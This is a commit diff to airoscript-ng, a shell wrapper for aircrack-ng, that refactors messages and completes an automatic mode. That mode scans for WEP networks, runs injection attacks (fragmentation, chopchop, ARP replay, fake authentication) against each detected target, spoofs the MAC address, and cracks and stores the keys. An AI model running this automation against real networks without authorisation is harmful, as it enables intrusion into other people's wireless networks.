Changed LOTS of stuffs. Careful, this can break something. It finishes the AUTO function, (except for automatic dictionary cracking, wich I'm thinking on. If I put digenpy as a plugin, wich I should, this can't use it
git-svn-id: http://svn.aircrack-ng.org/branch/airoscript-ng@1941 28c6078b-6c39-48e3-add9-af49d547ecab

diff --git a/src/functions/attacks/injection b/src/functions/attacks/injection
--- a/src/functions/attacks/injection
+++ b/src/functions/attacks/injection
@@ -21,7 +21,7 @@ injectmenu(){
     $clear
     while true; do
         ls -lah $DUMP_PATH/fragment-*.xor &>/dev/null
-        [[ $? != 0 ]] && { warn  "$mark Can't open fragmentation xor files. Returning"; echo;  return; }
+        [[ $? != 0 ]] && { warn  "${mark}Can't open fragmentation xor files. Returning"; echo;  return; }
         if [ "$1" == "frag" ]; then
             if [ "$AUTO" == 1 ]; then
                 if [ "$Client_MAC" != "" ]; then fragend $Client_MAC; return; fi
@@ -55,7 +55,7 @@ injectmenu(){
 
 fragend(){
     if [ "$Host_MAC" = "" ]; then
-        $clear && warn "$mark ERROR: You must select a target first"
+        $clear && warn "${mark}ERROR: You must select a target first"
     else
         $ARPFORGE -0 -a $Host_MAC -h $FAKE_MAC -k $Client_IP -l $Host_IP -y $DUMP_PATH/fragment-*.xor -w $DUMP_PATH/frag_$Host_MAC.cap
         execute "Fragmentation without client" $AIREPLAY -2 -r $DUMP_PATH/frag_$Host_MAC.cap -h $1 -x $INJECTRATE $iwifi 
@@ -64,7 +64,7 @@ fragend(){
 
 chopchopend(){
     if [ "$Host_MAC" = "" ]; then
-        $clear && warn "$mark ERROR: You must select a target first"
+        $clear && warn "${mark}ERROR: You must select a target first"
     else
         $ARPFORGE -0 -a $Host_MAC -h $Client_MAC -k $Client_IP -l $Host_IP -y $DUMP_PATH/fragment-*.xor -w $DUMP_PATH/frag_$Host_MAC.cap
         rm -rf $DUMP_PATH/chopchop_$Host_MAC*
diff --git a/src/functions/autocrack b/src/functions/autocrack
--- a/src/functions/autocrack
+++ b/src/functions/autocrack
@@ -16,34 +16,52 @@
 #        along with this program; if not, write to the Free Software
 #        Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
 
+filter_ssid(){
+    sleep 6;
+    echo
+    [[ "$filter_ssid" != "" ]] && {
+        tag; warn "${mark}Filtering essid to $filter_ssid";
+        grep $filter_ssid $DUMP_PATH/dump-02.csv > $DUMP_PATH/dump-03.csv;
+    } || {
+        cp $DUMP_PATH/dump-02.csv $DUMP_PATH/dump-03.csv;
+    }
+}
+
+unknown(){
+    ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`
+    head -n $ap_array $DUMP_PATH/dump-01.csv &> $DUMP_PATH/dump-02.csv
+}
+
+count_aps(){ i=0; while IFS=, read MAC; do i=$(( $i + 1 )) ; done < $DUMP_PATH/dump-03.csv ; echo $i; }
+
 doauto(){
+    source $path/autopwn
     F=0; export AUTO=1; export QUIET=1; export INTERACTIVE=0
-        menu_type "WEP" && CHoosescan && sleep $time_to_scan && killall -2 "airodump-ng" && sleep 2
-        echo " done"; sleep 1
-		if [ -e $DUMP_PATH/dump-01.csv ]; then
-    head -n $ap_array $DUMP_PATH/dump-01.csv &> $DUMP_PATH/dump-02.csv ; $clear
-        ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`
-    [[ "$filter_ssid" != "" ]] && { echo "$mark Filtering essid to $filter_ssid"; command grep $filter_ssid $DUMP_PATH/dump-02.csv > $DUMP_PATH/dump-03.csv ; } || { cp $DUMP_PATH/dump-02.csv $DUMP_PATH/dump-03.csv;  }
-	    while IFS=, read MAC; do i=$(( $i + 1 )) ; done < $DUMP_PATH/dump-03.csv
-        sleep 1
-        MAX_TARGETS=$i
-            echo "$mark Networks detected $MAX_TARGETS"; sleep 1
-            for i in `seq 1 $MAX_TARGETS`; do
-                echo "Trying to crack target: $i"
-    			AUTO=1; selectAp;  sleep 1
-                if [ "$Host_SSID" != "" ]; then
-                    autopwn
-                else
-                    echo "$mark Couldn't find essid, next try"
-                fi
-            done
-        else $clear; echo -n $mark;  _ "ERROR: Could not autodetect access points, have you selected an interface?"; fi
+    autoscan_autopwn;
+    unknown;
+    filter_ssid;
+    MAX_TARGETS=$(count_aps);
+    echo;
+    attack_functions=(wep_attacks_fakeauto wep_attacks_fakeinteractive wep_attacks_chopchop wep_attacks_caffelate wep_attacks_hirte wep_attacks_arpreplay_auto wep_attacks_arpreplay_interactive wep_attacks_fragmentation wep_attacks_chopchopclient wep_attacks_pskarp)
+    tag; warn "${mark}Networks detected $MAX_TARGETS"; sleep 1
+
+    for i in `seq 1 $MAX_TARGETS`; do
+        tag; warn "${mark}Trying to crack target $i"
+        export AUTO=2; selectAp;  sleep 1
+        if [ "$Host_SSID" != "" ]; then autopwn; 
+        else warn "${mark}Couldn't find essid, next try"; fi
+    done
     cleanautovars
 
-    echo $mark "Cracked networks: "
-    for i in /tmp/tmp.*/*.key; do
-        echo "\t$mark $i : `cat $i`"
+    tag; warn ${mark}"Cracked networks:"
+    for file in $DUMP_PATH/*.key; do
+        echo "\t${mark}$file : `cat $file`"
     done
+}
+
+continue_autocrack(){
+    single_question "Press c to configure, q to quit, any key to continue"
+    [[ "$ans" == "c" ]] && configure; [[ "$ans" == "q" ]] && { check_function doexit || source $path/internal/exit; doexit killme ; }
 }
 
 autopwn(){
@@ -52,32 +70,30 @@ autopwn(){
     sleep 1
     count=0
 
-    for i in $attack_functions; do
-        echo "$mark Attack $count. Using $i in $Host_MAC"
+    for i in ${attack_functions[@]}; do
+        tag; echo "${mark}Attack $count. Using $i in $Host_MAC"
         $i & cleanp & get_current_ivs
-        echo "$mark Needed ivs: $min_ivs"
-
+        tag; warn "${mark}Needed ivs: $min_ivs"
         while [ "1" ]; do 
-            echo -en "\r$mark IVS: `check_all_ivs`"  ;
             sleep 5 && { 
                 [[ "`check_all_ivs`" -gt "$min_ivs" ]] && { 
-                    echo; echo "$mark Trying to crack network, we have enough ivs";
+                    echo; warn "${mark}Trying to crack network, we have enough ivs";
                     cleanautovars;
                     auto autocrack;
                     cleanautovars;
-                    reset; 
-                    echo "$mark Network cracked, password stored in $DUMP_PATH/$Host_MAC.key"; 
-                    _read -n1 -p "Press enter to continue, q to exit and c to configure" foo; 
-                    [[ "$foo" == "c" ]] && configure; [[ "$foo" == "q" ]] && {
-                        check_function doexit || source $path/internal/exit
-                        doexit killme ; } 
-                } ;
+                    reset;
+                    echo "${mark}Network cracked, password stored in $DUMP_PATH/$Host_MAC.key"; 
+                    continue_autocrack
+                }
             }
+            specialwarn "\r${mark}Current IVS: `check_all_ivs`"  ;
         done
         count=$(( $count + 1 ))
     done
+
     cleanautovars
     clear=$oldclear;
+
 }
 
 check_all_ivs(){
@@ -91,14 +107,14 @@ check_all_ivs(){
 }
 
 get_current_ivs(){
-    auto return_ivs
-    [[ "$?" == 255 ]] && min_ivs=$autopwn_min_ivs || min_ivs=$?
+    auto return_ivs; a=$?
+    [[ "$a" == 255 ]] && min_ivs=$autopwn_min_ivs || min_ivs=$a
 }
 
 check_if_worked(){
     get_current_ivs
-    echo $'\t' "$mark Minium ivs required for this network: $min_ivs"
-    civs=`check_all_ivs`; echo $'\t' "$mark Current IVSs: $civs"
-    if [ "`check_all_ivs`" -gt $min_ivs ]; then echo $'\t' "$mark It worked, I have $min_ivs =)"; return 0; fi
+    echo $'\t' "${mark}Minium ivs required for this network: $min_ivs"
+    civs=`check_all_ivs`; echo $'\t' "${mark}Current IVSs: $civs"
+    if [ "`check_all_ivs`" -gt $min_ivs ]; then echo $'\t' "${mark}It worked, I have $min_ivs =)"; return 0; fi
     return 1
 }
diff --git a/src/functions/interface b/src/functions/interface
--- a/src/functions/interface
+++ b/src/functions/interface
@@ -40,7 +40,7 @@ _resonset(){
         reso=`_get_current_reso` ;
         [[ "$i" == $reso ]] && {
              reson=$reso
-            echo -e "$mark Automatically setting resolution to $reso";
+            echo -e "${mark}Automatically setting resolution to $reso";
          }
     done
     if [ "$reson" != "" ]; then export resonset=1; fi
@@ -95,7 +95,7 @@ mkmenueline(){ echo -en "${separator_v}\033[${1}C${separator_v}\033[${1}D${white
 mkmenulines(){ max=$1; shift; for i in "${@}"; do line=$(( $line + 1 )); mkmenueline $max $line; echo " $i"; done; }
 
 mkmenu(){
-    if [ "$AUTO" == 1 ]; then return; fi
+    if [ "$AUTO" == 2 ]; then return; fi
     max=`getmaxlenfromlist "${@}"`
     max=$(( $max + 10 ))
     title=$1; shift; line=0;
@@ -144,7 +144,7 @@ getterminal(){
 }
 
 reso() {
-    xhost &>/dev/null || { echo -e "$mark Error: Access control for X is disabled for root. Please, as your normal user execute 'xhost +`whoami`' and press enter to continue"; read ;}
+    xhost &>/dev/null || { echo -e "${mark}Error: Access control for X is disabled for root. Please, as your normal user execute 'xhost +`whoami`' and press enter to continue"; read ;}
         _resonset
 	while true; do
 		if [ "$resonset" = "" ]; then
diff --git a/src/functions/internal/startup b/src/functions/internal/startup
--- a/src/functions/internal/startup
+++ b/src/functions/internal/startup
@@ -49,13 +49,13 @@ askinterface(){
     export wificard="${INTERFACES[$choice - 1]}"
     [[ $wificard == "" ]] && {
         $clear
-        warn "$mark Error: That interface does not exists"
+        warn "${mark}Error: That interface does not exists"
         askinterface
     }
 }
 
 checkforcemac() {
-    if [ "$force_mac_address" == "1" ]; then $clear && warn "$mark Warn: Not checking mac" 
+    if [ "$force_mac_address" == "1" ]; then $clear && warn "${mark}Warn: Not checking mac" 
     else
         export mac=`$MACCHANGER -s $wificard|awk '/Current/ {print $3}'`
             if [ "$FAKE_MAC" != "$mac" ]; then wichchangemac $@; fi
@@ -71,22 +71,22 @@ guess_idata(){
 }
 
 wichchangemac(){
-    $clear
+    $clear; 
     while true; do
-         [[ "$1" != "" ]] && yn=$1 || {
+         [[ "$1" != "" ]] && choice=$1 || {
             mkmenu "Select MAC options" "Change MAC to FAKEMAC" "Change MAC to CLIENTMAC" "Use real MAC" "Manual Mac Input"
         }
         case $choice in
              1 ) ifconfig $wificard down
                 fail=`$MACCHANGER -m  $FAKE_MAC $wificard 2>&1`
-                [[ $? == 0 ]] && echo -e "${mark}Interface mac set up correctly" || echo -en "$mark Unable to set interface mac: $?\n $fail"
+                [[ $? == 0 ]] && echo -e "${mark}Interface mac set up correctly" || echo -en "${mark}Unable to set interface mac: $?\n $fail"
                   ifconfig $wificard up; break ;;
             2 ) ifconfig $wificard down; sleep 2
                  fail=`$MACCHANGER -m  $Client_MAC $wificard 2>&1`
-                [[ $? == 0 ]] && echo -e "${mark}Interface mac set up correctly" || echo -en "$mark Unable to set interface mac: $?\n $fail"
+                [[ $? == 0 ]] && echo -e "${mark}Interface mac set up correctly" || echo -en "${mark}Unable to set interface mac: $?\n $fail"
                 ifconfig $wificard up ; break ;;
             3)  export FAKE_MAC=$mac
-                warn "$mark Using for $wificard $FAKE_MAC = $mac"
+                warn "${mark}Using for $wificard $FAKE_MAC = $mac"
                 ifconfig $wificard down; sleep 2;
                 $MACCHANGER -m $mac $wificard &>/dev/null
                 ifconfig $wificard up;
@@ -94,7 +94,7 @@ wichchangemac(){
             4 ) single_question "MAC: "; Manual_MAC="$ans";
                 ifconfig $wificard down
                 fail=`$MACCHANGER -m  $Manual_MAC $wificard &>/dev/null`
-                [[ $? == 0 ]] && echo -e "${mark}Interface mac set up correctly" || echo -en "$mark Unable to set interface mac: $?\n $fail"
+                [[ $? == 0 ]] && echo -e "${mark}Interface mac set up correctly" || echo -en "${mark}Unable to set interface mac: $?\n $fail"
                 ifconfig $wificard up; break ;;
 
             * ) _ "Unknown response. Try again" ;;
@@ -108,28 +108,30 @@ selectap_wrapper(){
         mkmenueline $max r; echo " Rescan targets"; mkmenuline $max
         single_question "Select Target: "; choice="$ans"
 }
+
 # Some various functions that didn't know where to put them
 selectAp(){
     k=0; i=0; ap_array=`cat $DUMP_PATH/dump-01.csv | grep -a -n Station | awk -F : '{print $1}'`
     head -n $ap_array $DUMP_PATH/dump-01.csv &> $DUMP_PATH/dump-02.csv ; $clear
  # FIXME Filte disabled, make it work    
-    [[ "$filter_ssid" != "" ]] && { warn "$mark Filtering essid to $filter_ssid"; command grep $filter_ssid $DUMP_PATH/dump-02.csv > $DUMP_PATH/dump-03.csv ; } || { cp $DUMP_PATH/dump-02.csv $DUMP_PATH/dump-03.csv;  }
-    if [ "$AUTO" == 1 ]; then
-
+    #[[ "$filter_ssid" != "" ]] && { warn "${mark}Filtering essid to $filter_ssid"; command grep $filter_ssid $DUMP_PATH/dump-02.csv > $DUMP_PATH/dump-03.csv ; } || { 
+    cp $DUMP_PATH/dump-02.csv $DUMP_PATH/dump-03.csv;
+    if [ "$AUTO" == 2 ]; then
         choice=$CURRENT
         CURRENT=$(( $CURRENT + 1 ))
     else
-    res=();
-    title=$1; shift; line=0;
-    max=$((`tput cols` - 10));
-    mkmenuheader "Detected acess points" $max
-    mkmenuline $max
+        res=();
+        title=$1; shift; line=0;
+        max=$((`tput cols` - 10));
+        echo
+        mkmenuheader "Detected access points" $max
+        mkmenuline $max
     fi
     while IFS=, read MAC FTS LTS CHANNEL SPEED PRIVACY CYPHER AUTH POWER BEACON IV LANIP IDLENGTH ESSID KEY;do
         longueur=${#MAC}
         if [ $longueur -ge 17 ]; then
             k=$(($k+1))
-            if [ "$AUTO" != 1  ]; then
+            if [ "$AUTO" != 2  ]; then
                 [[ "$k" == 1 ]] && ST="TRUE" || ST="FALSE"
                 res+=( "$ST" "$k" " $MAC " "$CHANNEL" "$PRIVACY" "$POWER" "$IDLENGTH" "$ESSID");
                 mkmenueline $max $k
@@ -142,7 +144,7 @@ selectAp(){
         fi
     done < $DUMP_PATH/dump-03.csv
     
-    if [ "$AUTO" != 1 ]; then selectap_wrapper; fi
+    if [ "$AUTO" != 2 ]; then selectap_wrapper; fi
     if [ "$choice" != "r" ] ; then
         idlenght=${aidlenght[$choice]}
         ssid=${assid[$choice]}
@@ -158,7 +160,7 @@ selectAp(){
         acouper=${#ssid}
         fin=$(($acouper-idlength))
         Host_SSID=${ssid:1:fin}
-        echo "$mark Target network is $Host_SSID $Ho st_MAC"
+        tag; echo "${mark}Target network is $Host_SSID $Host_MAC"
     else autoscan; fi
 }
 
@@ -169,12 +171,20 @@ launch_counter(){
     done
 }
 
+autoscan_autopwn(){
+    launch_counter $time_to_scan &
+    OLDINTERACTIVE=$INTERACTIVE; F=0; export AUTO=2; export QUIET=1; export INTERACTIVE=0
+    export ENCRYPT="WEP"; choosescan;  sleep $time_to_scan && killall -2 "airodump-ng"; 
+    [[ $AUTO != 2 ]] && select_ap
+    cleanautovars
+}
+
 autoscan(){
     launch_counter $time_to_scan &
     OLDINTERACTIVE=$INTERACTIVE; F=0; export AUTO=1; export QUIET=1; export INTERACTIVE=0
     menu_type "" && sleep $time_to_scan && killall -2 "airodump-ng"; 
+    [[ $AUTO != 2 ]] && select_ap
     cleanautovars
-    select_ap
 }
 
 Scan(){
@@ -183,7 +193,8 @@ Scan(){
     temporary_switch_clear
     warn "$mark`gettext 'Interface used is'` : $wifi ($iwifi) for $wificard "
     warn "$mark`gettext 'Interface type is'` : $TYPE ($DRIVER)"
-    execute "Scanning for targets" $AIRODUMP -w $DUMP_PATH/dump --encrypt $ENCRYPT -a $wifi
+    export QUIET=1;
+    execute "Scanning for targets: " $AIRODUMP -w $DUMP_PATH/dump --encrypt $ENCRYPT -a $wifi
     temporary_switch_clear
     export SCAN=0
 }
